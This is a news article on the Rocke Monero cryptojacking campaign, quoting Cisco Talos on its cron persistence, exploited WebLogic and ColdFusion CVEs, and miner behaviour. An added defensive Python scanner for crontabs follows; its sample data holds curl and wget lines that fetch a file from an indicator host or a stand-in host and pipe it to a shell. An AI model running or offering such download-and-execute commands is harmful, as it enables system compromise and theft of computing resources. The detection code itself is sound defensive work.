Rocke, the New Monero Cryptojacking Malware on the Block


Cryptocurrency mining malware, also known as cryptojacking, has steadily stolen the spotlight from ransomware since last year. It is a form of malware whose goal is to mine cryptocurrency for its author using the CPU and GPU cycles of the victim's computer. The loudness of a ransomware infection (the malware has to announce its presence to the user in order to solicit a ransom payment) is a world away from the silence of a cryptojacking infection: cryptojacking needs time and quietly stolen processing cycles to mine coins effectively for its authors.

As reported by Cisco in its official blog, Git repositories have been targeted by a Monero cryptojacking malware known as ‘Rocke’ since April this year. Rocke is built with vulnerable HTTP File Servers and Git repositories in mind in its quest to mine Monero coins.

“Chinese-speaking actor which we refer to as “Rocke” came to our attention. Rocke actively engages in distributing and executing cryptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file “logo.jpg” from “3389[.]space.” This file is a shell script which, in turn, downloads mining executables from the threat actor’s Git repositories and saves them under the filename “java.” The exact file downloaded depends on the victim’s system architecture,” said David Liebensberg, Cisco’s Senior Threat Analyst, in the blog.
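The persistence step in the quote above (a cron job that fetches an image-named file and runs it as a shell script) is something a defender can look for directly in crontabs. The following is an added example, not code from the original article or from Cisco Talos: it scans crontab lines for download-and-execute patterns. The sample crontab is constructed; the host and file name reused in it are the indicators named in the quote.

```python
import re

# Constructed sample crontab (not from the original article). The
# 3389.space/logo.jpg entry mirrors the indicator in the Talos quote.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://3389.space/logo.jpg | sh
* * * * * wget -q -O- http://example.invalid/update.png | bash
30 2 * * 0 /usr/local/bin/backup.sh
"""

FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
# Executable content hidden behind an image extension, as with logo.jpg
IMAGE_URL = re.compile(r"https?://\S+\.(jpe?g|png|gif)\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s]+)")
KNOWN_BAD_HOSTS = {"3389.space"}  # defanged on the page as 3389[.]space


def analyse_cron(text):
    """Return [(line_number, [reasons])] for suspicious cron entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 5)  # five schedule fields + command
        if len(fields) < 6:
            continue
        command = fields[5]
        reasons = []
        fetches = bool(FETCH_TOOL.search(command))
        if fetches and PIPE_TO_SHELL.search(command):
            reasons.append("download piped to shell")
        if fetches and IMAGE_URL.search(command):
            reasons.append("fetches image-named file")
        for host in URL_HOST.findall(command):
            if host.lower() in KNOWN_BAD_HOSTS:
                reasons.append("known indicator host " + host)
        if reasons:
            findings.append((lineno, reasons))
    return findings


if __name__ == "__main__":
    for lineno, reasons in analyse_cron(SAMPLE_CRONTAB):
        print(f"line {lineno}: {', '.join(reasons)}")
```

The same checks apply to `/etc/cron.d`, `/etc/crontab` and per-user crontabs; a hit on the generic patterns is worth reviewing even when no known host is involved.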

The Rocke cryptojacking malware is considered by Cisco to be a work in progress, as more features are added with every new variant. “We will examine several of Rocke’s campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,” added Liebensberg.

From Cisco’s further analysis, they have found out that two known vulnerabilities are currently being exploited by Rocke’s payload: CVE-2017-10271 and CVE-2017-3066. The former is an Oracle WebLogic server vulnerability, while the latter is an Adobe ColdFusion Java deserialization flaw. Embedded in Rocke’s code is a copy of TermsHost.exe, a well-known Monero coin mining module that anyone can buy for $14. The Monero mining module is tweaked by the malware authors to compute hashes during the machine’s idle periods, which lessens the chance that users notice a problem with the machine while it is busy. Rocke also hijacks a registry startup entry so that it launches itself in the background automatically after a reboot, and opens a hole in the Windows firewall to allow incoming and outgoing traffic between Rocke and its command and control servers.

“Cisco Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates,” concluded Liebensberg.
